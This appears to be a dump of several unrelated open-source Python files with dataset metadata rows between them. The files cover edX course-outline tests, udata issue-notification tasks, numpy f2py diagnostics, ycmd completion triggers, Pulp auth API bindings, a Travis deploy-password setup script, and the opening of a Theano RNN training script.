cls.course = cls.create_test_course()
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
CourseEnrollment.enroll(cls.user, cls.course.id)
cls.site = Site.objects.get_current()
@classmethod
def create_test_course(cls):
"""
Creates a test course.
"""
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
chapter2 = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential3 = ItemFactory.create(category='sequential', parent_location=chapter2.location)
sequential4 = ItemFactory.create(category='sequential', parent_location=chapter2.location)
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
vertical2 = ItemFactory.create(category='vertical', parent_location=sequential2.location)
vertical3 = ItemFactory.create(category='vertical', parent_location=sequential3.location)
vertical4 = ItemFactory.create(category='vertical', parent_location=sequential4.location)
course.children = [chapter, chapter2]
chapter.children = [sequential, sequential2]
chapter2.children = [sequential3, sequential4]
sequential.children = [vertical]
sequential2.children = [vertical2]
sequential3.children = [vertical3]
sequential4.children = [vertical4]
if hasattr(cls, 'user'):
CourseEnrollment.enroll(cls.user, course.id)
return course
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlineResumeCourse, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
def visit_sequential(self, course, chapter, sequential):
"""
Navigates to the provided sequential.
"""
last_accessed_url = reverse(
'courseware_section',
kwargs={
'course_id': text_type(course.id),
'chapter': chapter.url_name,
'section': sequential.url_name,
}
)
assert 200 == self.client.get(last_accessed_url).status_code
@override_waffle_switch(ENABLE_COMPLETION_TRACKING_SWITCH, active=True)
def complete_sequential(self, course, sequential):
"""
Completes provided sequential.
"""
course_key = CourseKey.from_string(str(course.id))
# Fake a visit to sequence2/vertical2
block_key = UsageKey.from_string(six.text_type(sequential.location))
if block_key.course_key.run is None:
# Old mongo keys must be annotated with course run info before calling submit_completion:
block_key = block_key.replace(course_key=course_key)
completion = 1.0
BlockCompletion.objects.submit_completion(
user=self.user,
block_key=block_key,
completion=completion
)
def visit_course_home(self, course, start_count=0, resume_count=0):
"""
Helper function to navigates to course home page, test for resume buttons
:param course: course factory object
:param start_count: number of times 'Start Course' should appear
:param resume_count: number of times 'Resume Course' should appear
:return: response object
"""
response = self.client.get(course_home_url(course))
assert response.status_code == 200
self.assertContains(response, 'Start Course', count=start_count)
self.assertContains(response, 'Resume Course', count=resume_count)
return response
def test_course_home_completion(self):
"""
Test that completed blocks appear checked on course home page
"""
self.override_waffle_switch(True)
course = self.course
vertical = course.children[0].children[0].children[0]
response = self.client.get(course_home_url(course))
content = pq(response.content)
assert len(content('.fa-check')) == 0
self.complete_sequential(self.course, vertical)
response = self.client.get(course_home_url(course))
content = pq(response.content)
# Subsection should be checked
assert len(content('.fa-check')) == 1
def test_start_course(self):
"""
Tests that the start course button appears when the course has never been accessed.
Technically, this is a course home test, and not a course outline test, but checking the counts of
start/resume course should be done together to not get a false positive.
"""
course = self.course
response = self.visit_course_home(course, start_count=1, resume_count=0)
content = pq(response.content)
vertical = course.children[0].children[0].children[0]
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical.url_name))
@override_settings(LMS_BASE='test_url:9999')
def test_resume_course_with_completion_api(self):
"""
Tests completion API resume button functionality
"""
self.override_waffle_switch(True)
# Course tree
course = self.course
vertical1 = course.children[0].children[0].children[0]
vertical2 = course.children[0].children[1].children[0]
self.complete_sequential(self.course, vertical1)
# Test for 'resume' link
response = self.visit_course_home(course, resume_count=1)
# Test for 'resume' link URL - should be vertical 1
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical1.url_name))
self.complete_sequential(self.course, vertical2)
# Test for 'resume' link
response = self.visit_course_home(course, resume_count=1)
# Test for 'resume' link URL - should be vertical 2
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical2.url_name))
# visit sequential 1, make sure 'Resume Course' URL is robust against 'Last Visited'
# (even though I visited seq1/vert1, 'Resume Course' still points to seq2/vert2)
self.visit_sequential(course, course.children[0], course.children[0].children[0])
# Test for 'resume' link URL - should be vertical 2 (last completed block, NOT last visited)
response = self.visit_course_home(course, resume_count=1)
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical2.url_name))
def test_resume_course_deleted_sequential(self):
"""
Tests resume course when the last completed sequential is deleted and
there is another sequential in the vertical.
"""
course = self.create_test_course()
# first navigate to a sequential to make it the last accessed
chapter = course.children[0]
assert len(chapter.children) >= 2
sequential = chapter.children[0]
sequential2 = chapter.children[1]
self.complete_sequential(course, sequential)
self.complete_sequential(course, sequential2)
# remove one of the sequentials from the chapter
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course.id):
self.store.delete_item(sequential.location, self.user.id)
# check resume course buttons
response = self.visit_course_home(course, resume_count=1)
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/sequential/' + sequential2.url_name))
def test_resume_course_deleted_sequentials(self):
"""
Tests resume course when the last completed sequential is deleted and
there are no sequentials left in the vertical.
"""
course = self.create_test_course()
# first navigate to a sequential to make it the last accessed
chapter = course.children[0]
assert len(chapter.children) == 2
sequential = chapter.children[0]
self.complete_sequential(course, sequential)
# remove all sequentials from chapter
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course.id):
for sequential in chapter.children:
self.store.delete_item(sequential.location, self.user.id)
# check resume course buttons
self.visit_course_home(course, start_count=1, resume_count=0)
def test_course_home_for_global_staff(self):
"""
Tests that staff user can access the course home without being enrolled
in the course.
"""
course = self.course
self.user.is_staff = True
self.user.save()
self.override_waffle_switch(True)
CourseEnrollment.get_enrollment(self.user, course.id).delete()
response = self.visit_course_home(course, start_count=1, resume_count=0)
content = pq(response.content)
vertical = course.children[0].children[0].children[0]
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical.url_name))
@override_waffle_switch(ENABLE_COMPLETION_TRACKING_SWITCH, active=True)
def test_course_outline_auto_open(self):
"""
Tests that the course outline auto-opens to the first subsection
in a course if a user has no completion data, and to the
last-accessed subsection if a user does have completion data.
"""
def get_sequential_button(url, is_hidden):
is_hidden_string = "is-hidden" if is_hidden else ""
return "<olclass=\"outline-itemaccordion-panel" + is_hidden_string + "\"" \
"id=\"" + url + "_contents\"" \
"aria-labelledby=\"" + url + "\"" \
">"
# Course tree
course = self.course
chapter1 = course.children[0]
chapter2 = course.children[1]
response_content = self.client.get(course_home_url(course)).content
stripped_response = text_type(re.sub(b"\\s+", b"", response_content), "utf-8")
assert get_sequential_button(text_type(chapter1.location), False) in stripped_response
assert get_sequential_button(text_type(chapter2.location), True) in stripped_response
content = pq(response_content)
button = content('#expand-collapse-outline-all-button')
assert 'Expand All' == button.children()[0].text
def test_user_enrolled_after_completion_collection(self):
"""
Tests that the _completion_data_collection_start() method returns the created
time of the waffle switch that enables completion data tracking.
"""
view = CourseOutlineFragmentView()
switch_name = ENABLE_COMPLETION_TRACKING_SWITCH.name
switch, _ = Switch.objects.get_or_create(name=switch_name)
# pylint: disable=protected-access
assert switch.created == view._completion_data_collection_start()
switch.delete()
def test_user_enrolled_after_completion_collection_default(self):
"""
Tests that the _completion_data_collection_start() method returns a default constant
when no Switch object exists for completion data tracking.
"""
view = CourseOutlineFragmentView()
# pylint: disable=protected-access
assert DEFAULT_COMPLETION_TRACKING_START == view._completion_data_collection_start()
class TestCourseOutlinePreview(SharedModuleStoreTestCase, MasqueradeMixin):
"""
Unit tests for staff preview of the course outline.
"""
def test_preview(self):
"""
Verify the behavior of preview for the course outline.
"""
course = CourseFactory.create(
start=datetime.datetime.now() - datetime.timedelta(days=30)
)
staff_user = StaffFactory(course_key=course.id, password=TEST_PASSWORD)
CourseEnrollment.enroll(staff_user, course.id)
future_date = datetime.datetime.now() + datetime.timedelta(days=30)
with self.store.bulk_operations(course.id):
chapter = ItemFactory.create(
category='chapter',
parent_location=course.location,
display_name='First Chapter',
)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
ItemFactory.create(category='vertical', parent_location=sequential.location)
chapter = ItemFactory.create(
category='chapter',
parent_location=course.location,
display_name='Future Chapter',
start=future_date,
)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
ItemFactory.create(category='vertical', parent_location=sequential.location)
# Verify that a staff user sees a chapter with a due date in the future
self.client.login(username=staff_user.username, password='test')
url = course_home_url(course)
response = self.client.get(url)
assert response.status_code == 200
self.assertContains(response, 'Future Chapter')
# Verify that staff masquerading as a learner see the future chapter.
self.update_masquerade(course=course, role='student')
response = self.client.get(url)
assert response.status_code == 200
self.assertContains(response, 'Future Chapter')
| agpl-3.0 | -494,362,490,768,276,200 | 43.699219 | 183 | 0.659879 | false |
opendatateam/udata | udata/core/issues/tasks.py | 2 | 2336 | from udata import mail
from udata.i18n import lazy_gettext as _
from udata.models import Dataset, Reuse
from udata.tasks import connect, get_logger
from .models import Issue, Message
from .signals import on_new_issue, on_new_issue_comment, on_issue_closed
log = get_logger(__name__)
def owner_recipients(issue):
if issue.subject.organization:
return [m.user for m in issue.subject.organization.members]
else:
return [issue.subject.owner]
@connect(on_new_issue, by_id=True)
def notify_new_issue(issue_id):
issue = Issue.objects.get(pk=issue_id)
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue)
subject = _('Your %(type)s have a new issue',
type=issue.subject.verbose_name)
mail.send(subject, recipients, 'new_issue', issue=issue,
message=issue.discussion[0])
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
@connect(on_new_issue_comment, by_id=True)
def notify_new_issue_comment(issue_id, message=None):
issue = Issue.objects.get(pk=issue_id)
message = issue.discussion[message]
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue) + [
m.posted_by for m in issue.discussion]
recipients = [u for u in set(recipients) if u != message.posted_by]
subject = _('%(user)s commented your issue',
user=message.posted_by.fullname)
mail.send(subject, recipients, 'new_issue_comment',
issue=issue, message=message)
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
@connect(on_issue_closed, by_id=True)
def notify_issue_closed(issue_id, message=None):
issue = Issue.objects.get(pk=issue_id)
message = issue.discussion[message]
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue) + [
m.posted_by for m in issue.discussion]
recipients = [u for u in set(recipients) if u != message.posted_by]
subject = _('An issue has been closed')
mail.send(subject, recipients, 'issue_closed',
issue=issue, message=message)
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
| agpl-3.0 | 2,922,285,658,324,438,500 | 37.933333 | 78 | 0.659247 | false |
houseind/robothon | GlyphProofer/dist/GlyphProofer.app/Contents/Resources/lib/python2.6/numpy/f2py/diagnose.py | 7 | 5683 | #!/usr/bin/env python
import os,sys,tempfile
def run_command(cmd):
print 'Running %r:' % (cmd)
s = os.system(cmd)
print '------'
def run():
_path = os.getcwd()
os.chdir(tempfile.gettempdir())
print '------'
print 'os.name=%r' % (os.name)
print '------'
print 'sys.platform=%r' % (sys.platform)
print '------'
print 'sys.version:'
print sys.version
print '------'
print 'sys.prefix:'
print sys.prefix
print '------'
print 'sys.path=%r' % (':'.join(sys.path))
print '------'
try:
import Numeric
has_Numeric = 1
except ImportError:
print 'Failed to import Numeric:',sys.exc_value
has_Numeric = 0
try:
import numarray
has_numarray = 1
except ImportError:
print 'Failed to import numarray:',sys.exc_value
has_numarray = 0
try:
import numpy
has_newnumpy = 1
except ImportError:
print 'Failed to import new numpy:', sys.exc_value
has_newnumpy = 0
try:
import f2py2e
has_f2py2e = 1
except ImportError:
print 'Failed to import f2py2e:',sys.exc_value
has_f2py2e = 0
try:
import numpy.distutils
has_numpy_distutils = 2
except ImportError:
try:
import numpy_distutils
has_numpy_distutils = 1
except ImportError:
print 'Failed to import numpy_distutils:',sys.exc_value
has_numpy_distutils = 0
if has_Numeric:
try:
print 'Found Numeric version %r in %s' % \
(Numeric.__version__,Numeric.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_numarray:
try:
print 'Found numarray version %r in %s' % \
(numarray.__version__,numarray.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_newnumpy:
try:
print 'Found new numpy version %r in %s' % \
(numpy.__version__, numpy.__file__)
except Exception,msg:
print 'error:', msg
print '------'
if has_f2py2e:
try:
print 'Found f2py2e version %r in %s' % \
(f2py2e.__version__.version,f2py2e.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_numpy_distutils:
try:
if has_numpy_distutils==2:
print 'Found numpy.distutils version %r in %r' % (\
numpy.distutils.__version__,
numpy.distutils.__file__)
else:
print 'Found numpy_distutils version %r in %r' % (\
numpy_distutils.numpy_distutils_version.numpy_distutils_version,
numpy_distutils.__file__)
print '------'
except Exception,msg:
print 'error:',msg
print '------'
try:
if has_numpy_distutils==1:
print 'Importing numpy_distutils.command.build_flib ...',
import numpy_distutils.command.build_flib as build_flib
print 'ok'
print '------'
try:
print 'Checking availability of supported Fortran compilers:'
for compiler_class in build_flib.all_compilers:
compiler_class(verbose=1).is_available()
print '------'
except Exception,msg:
print 'error:',msg
print '------'
except Exception,msg:
print 'error:',msg,'(ignore it, build_flib is obsolute for numpy.distutils 0.2.2 and up)'
print '------'
try:
if has_numpy_distutils==2:
print 'Importing numpy.distutils.fcompiler ...',
import numpy.distutils.fcompiler as fcompiler
else:
print 'Importing numpy_distutils.fcompiler ...',
import numpy_distutils.fcompiler as fcompiler
print 'ok'
print '------'
try:
print 'Checking availability of supported Fortran compilers:'
fcompiler.show_fcompilers()
print '------'
except Exception,msg:
print 'error:',msg
print '------'
except Exception,msg:
print 'error:',msg
print '------'
try:
if has_numpy_distutils==2:
print 'Importing numpy.distutils.cpuinfo ...',
from numpy.distutils.cpuinfo import cpuinfo
print 'ok'
print '------'
else:
try:
print 'Importing numpy_distutils.command.cpuinfo ...',
from numpy_distutils.command.cpuinfo import cpuinfo
print 'ok'
print '------'
except Exception,msg:
print 'error:',msg,'(ignore it)'
print 'Importing numpy_distutils.cpuinfo ...',
from numpy_distutils.cpuinfo import cpuinfo
print 'ok'
print '------'
cpu = cpuinfo()
print 'CPU information:',
for name in dir(cpuinfo):
if name[0]=='_' and name[1]!='_' and getattr(cpu,name[1:])():
print name[1:],
print '------'
except Exception,msg:
print 'error:',msg
print '------'
os.chdir(_path)
if __name__ == "__main__":
run()
| mit | 1,156,515,901,983,183,600 | 33.23494 | 101 | 0.48302 | false |
oblitum/ycmd | ycmd/completers/completer_utils.py | 1 | 9555 | # Copyright (C) 2013 Google Inc.
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
# Must not import ycm_core here! Vim imports completer, which imports this file.
# We don't want ycm_core inside Vim.
import os
import re
from collections import defaultdict
from future.utils import iteritems
from ycmd.utils import ToCppStringCompatible, ToUnicode, ReadFile
class PreparedTriggers( object ):
def __init__( self, user_trigger_map = None, filetype_set = None ):
user_prepared_triggers = ( _FiletypeTriggerDictFromSpec(
dict( user_trigger_map ) ) if user_trigger_map else
defaultdict( set ) )
final_triggers = _FiletypeDictUnion( PREPARED_DEFAULT_FILETYPE_TRIGGERS,
user_prepared_triggers )
if filetype_set:
final_triggers = dict( ( k, v ) for k, v in iteritems( final_triggers )
if k in filetype_set )
self._filetype_to_prepared_triggers = final_triggers
def MatchingTriggerForFiletype( self,
current_line,
start_codepoint,
column_codepoint,
filetype ):
try:
triggers = self._filetype_to_prepared_triggers[ filetype ]
except KeyError:
return None
return _MatchingSemanticTrigger( current_line,
start_codepoint,
column_codepoint,
triggers )
def MatchesForFiletype( self,
current_line,
start_codepoint,
column_codepoint,
filetype ):
return self.MatchingTriggerForFiletype( current_line,
start_codepoint,
column_codepoint,
filetype ) is not None
def _FiletypeTriggerDictFromSpec( trigger_dict_spec ):
triggers_for_filetype = defaultdict( set )
for key, triggers in iteritems( trigger_dict_spec ):
filetypes = key.split( ',' )
for filetype in filetypes:
regexes = [ _PrepareTrigger( x ) for x in triggers ]
triggers_for_filetype[ filetype ].update( regexes )
return triggers_for_filetype
def _FiletypeDictUnion( dict_one, dict_two ):
"""Returns a new filetype dict that's a union of the provided two dicts.
Dict params are supposed to be type defaultdict(set)."""
def UpdateDict( first, second ):
for key, value in iteritems( second ):
first[ key ].update( value )
final_dict = defaultdict( set )
UpdateDict( final_dict, dict_one )
UpdateDict( final_dict, dict_two )
return final_dict
# start_codepoint and column_codepoint are codepoint offsets in the unicode
# string line_value.
def _RegexTriggerMatches( trigger,
line_value,
start_codepoint,
column_codepoint ):
for match in trigger.finditer( line_value ):
# By definition of 'start_codepoint', we know that the character just before
# 'start_codepoint' is not an identifier character but all characters
# between 'start_codepoint' and 'column_codepoint' are. This means that if
# our trigger ends with an identifier character, its tail must match between
# 'start_codepoint' and 'column_codepoint', 'start_codepoint' excluded. But
# if it doesn't, its tail must match exactly at 'start_codepoint'. Both
# cases are mutually exclusive hence the following condition.
if start_codepoint <= match.end() and match.end() <= column_codepoint:
return True
return False
# start_codepoint and column_codepoint are 0-based and are codepoint offsets
# into the unicode string line_value.
def _MatchingSemanticTrigger( line_value, start_codepoint, column_codepoint,
trigger_list ):
if start_codepoint < 0 or column_codepoint < 0:
return None
line_length = len( line_value )
if not line_length or start_codepoint > line_length:
return None
# Ignore characters after user's caret column
line_value = line_value[ : column_codepoint ]
for trigger in trigger_list:
if _RegexTriggerMatches( trigger,
line_value,
start_codepoint,
column_codepoint ):
return trigger
return None
def _MatchesSemanticTrigger( line_value, start_codepoint, column_codepoint,
trigger_list ):
return _MatchingSemanticTrigger( line_value,
start_codepoint,
column_codepoint,
trigger_list ) is not None
def _PrepareTrigger( trigger ):
trigger = ToUnicode( trigger )
if trigger.startswith( TRIGGER_REGEX_PREFIX ):
return re.compile( trigger[ len( TRIGGER_REGEX_PREFIX ) : ], re.UNICODE )
return re.compile( re.escape( trigger ), re.UNICODE )
def _PathToCompletersFolder():
dir_of_current_script = os.path.dirname( os.path.abspath( __file__ ) )
return os.path.join( dir_of_current_script )
def PathToFiletypeCompleterPluginLoader( filetype ):
return os.path.join( _PathToCompletersFolder(), filetype, 'hook.py' )
def FiletypeCompleterExistsForFiletype( filetype ):
return os.path.exists( PathToFiletypeCompleterPluginLoader( filetype ) )
def FilterAndSortCandidatesWrap( candidates, sort_property, query ):
from ycm_core import FilterAndSortCandidates
# The c++ interface we use only understands the (*native*) 'str' type (i.e.
# not the 'str' type from python-future. If we pass it a 'unicode' or
# 'bytes' instance then various things blow up, such as converting to
# std::string. Therefore all strings passed into the c++ API must pass through
# ToCppStringCompatible (or more strictly all strings which the C++ code
# needs to use and convert. In this case, just the insertion text property)
# For efficiency, the conversion of the insertion text property is done in the
# C++ layer.
return FilterAndSortCandidates( candidates,
ToCppStringCompatible( sort_property ),
ToCppStringCompatible( query ) )
TRIGGER_REGEX_PREFIX = 're!'
DEFAULT_FILETYPE_TRIGGERS = {
'c' : [ '->', '.', '(', ',' ],
'objc' : [
'->',
'.',
r're!\[[_a-zA-Z]+\w*\s', # bracketed calls
r're!^\s*[^\W\d]\w*\s', # bracketless calls
r're!\[.*\]\s', # method composition
],
'ocaml' : [ '.', '#' ],
'cpp,objcpp' : [ '->', '.', '::', '(', ',' ],
'perl' : [ '->' ],
'php' : [ '->', '::' ],
'cs,java,javascript,typescript,d,python,perl6,scala,vb,elixir,go,groovy' : [
'.'
],
'ruby,rust' : [ '.', '::' ],
'lua' : [ '.', ':' ],
'erlang' : [ ':' ],
'swift' : ['.', '(', ',', ':'],
}
PREPARED_DEFAULT_FILETYPE_TRIGGERS = _FiletypeTriggerDictFromSpec(
DEFAULT_FILETYPE_TRIGGERS )
INCLUDE_REGEX = re.compile( '\s*#\s*(?:include|import)\s*("|<)' )
def AtIncludeStatementStart( line ):
match = INCLUDE_REGEX.match( line )
if not match:
return False
# Check if the whole string matches the regex
return match.end() == len( line )
def GetIncludeStatementValue( line, check_closing = True ):
"""Returns include statement value and boolean indicating whether
include statement is quoted.
If check_closing is True the string is scanned for statement closing
character (" or >) and substring between opening and closing characters is
returned. The whole string after opening character is returned otherwise"""
match = INCLUDE_REGEX.match( line )
include_value = None
quoted_include = False
if match:
quoted_include = ( match.group( 1 ) == '"' )
if not check_closing:
include_value = line[ match.end(): ]
else:
close_char = '"' if quoted_include else '>'
close_char_pos = line.find( close_char, match.end() )
if close_char_pos != -1:
include_value = line[ match.end() : close_char_pos ]
return include_value, quoted_include
def GetFileContents( request_data, filename ):
"""Returns the contents of the absolute path |filename| as a unicode
string. If the file contents exist in |request_data| (i.e. it is open and
potentially modified/dirty in the user's editor), then it is returned,
otherwise the file is read from disk (assuming a UTF-8 encoding) and its
contents returned."""
file_data = request_data[ 'file_data' ]
if filename in file_data:
return ToUnicode( file_data[ filename ][ 'contents' ] )
return ToUnicode( ReadFile( filename ) )
| gpl-3.0 | 4,772,879,747,813,162,000 | 36.324219 | 80 | 0.632548 | false |
beav/pulp | bindings/pulp/bindings/auth.py | 2 | 4622 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from pulp.bindings.base import PulpAPI
from pulp.bindings.search import SearchAPI
class UserAPI(PulpAPI):
"""
Connection class to access user specific calls
"""
def __init__(self, pulp_connection):
super(UserAPI, self).__init__(pulp_connection)
self.base_path = "/v2/users/"
def users(self):
path = self.base_path
return self.server.GET(path)
def create(self, login, password, name=None, roles=None):
path = self.base_path
userdata = {"login": login,
"password": password,
"name": name,
"roles": roles,}
return self.server.POST(path, userdata)
def user(self, login):
path = self.base_path + ("%s/" % login)
return self.server.GET(path)
def delete(self, login):
path = self.base_path + "%s/" % login
return self.server.DELETE(path)
def update(self, login, delta):
path = self.base_path + "%s/" % login
body = {'delta' : delta}
return self.server.PUT(path, body)
class UserSearchAPI(SearchAPI):
PATH = '/v2/users/search/'
class RoleAPI(PulpAPI):
"""
Connection class to access role specific calls
"""
def __init__(self, pulp_connection):
super(RoleAPI, self).__init__(pulp_connection)
self.base_path = "/v2/roles/"
def roles(self):
path = self.base_path
return self.server.GET(path)
def create(self, role_id, display_name=None, description=None):
path = self.base_path
roledata = {"role_id": role_id,
"display_name": display_name,
"description": description}
return self.server.POST(path, roledata)
def role(self, role_id):
path = self.base_path + ("%s/" % role_id)
return self.server.GET(path)
def delete(self, role_id):
path = self.base_path + "%s/" % role_id
return self.server.DELETE(path)
def update(self, role_id, delta):
path = self.base_path + "%s/" % role_id
body = {'delta' : delta}
return self.server.PUT(path, body)
def add_user(self, role_id, login):
path = self.base_path + "%s/" % role_id + 'users/'
data = {"login": login}
return self.server.POST(path, data)
def remove_user(self, role_id, login):
path = self.base_path + "%s/" % role_id + 'users/' + "%s/" % login
return self.server.DELETE(path)
class PermissionAPI(PulpAPI):
"""
Connection class to access permission specific calls
"""
def __init__(self, pulp_connection):
super(PermissionAPI, self).__init__(pulp_connection)
self.base_path = "/v2/permissions/"
def permission(self, resource):
path = self.base_path
query_parameters = {'resource' : resource}
return self.server.GET(path, query_parameters)
def grant_to_user(self, resource, login, operations):
path = self.base_path + "actions/grant_to_user/"
data = {"resource": resource,
"login": login,
"operations": operations}
return self.server.POST(path, data)
def grant_to_role(self, resource, role_id, operations):
path = self.base_path + "actions/grant_to_role/"
data = {"resource": resource,
"role_id": role_id,
"operations": operations}
return self.server.POST(path, data)
def revoke_from_user(self, resource, login, operations):
path = self.base_path + "actions/revoke_from_user/"
data = {"resource": resource,
"login": login,
"operations": operations}
return self.server.POST(path, data)
def revoke_from_role(self, resource, role_id, operations):
path = self.base_path + "actions/revoke_from_role/"
data = {"resource": resource,
"role_id": role_id,
"operations": operations}
return self.server.POST(path, data)
| gpl-2.0 | -343,089,840,848,470,400 | 33.485075 | 75 | 0.592729 | false |
Trax-air/swagger-stub | travis_pypi_setup.py | 1 | 3768 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file
"""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except:
from urllib.request import urlopen
GITHUB_REPO = 'Trax-Air/swagger_stub'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key, with work-around for keys using
incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning.
"""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
with open(filepath) as f:
return yaml.load(f)
def save_yaml_config(filepath, config):
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Update the deploy section of the .travis.yml file
to use the given encrypted password.
"""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
line = ('# This file was autogenerated and will overwrite'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: {0!s})'.format(GITHUB_REPO))
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
| mit | 5,696,835,382,458,828,000 | 29.885246 | 80 | 0.679406 | false |
wangyarui/deep-learning | rnn/train-theano.py | 1 | 3943 | #! /usr/bin/env python
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn_theano import RNNTheano
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (time, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model oarameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, time), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
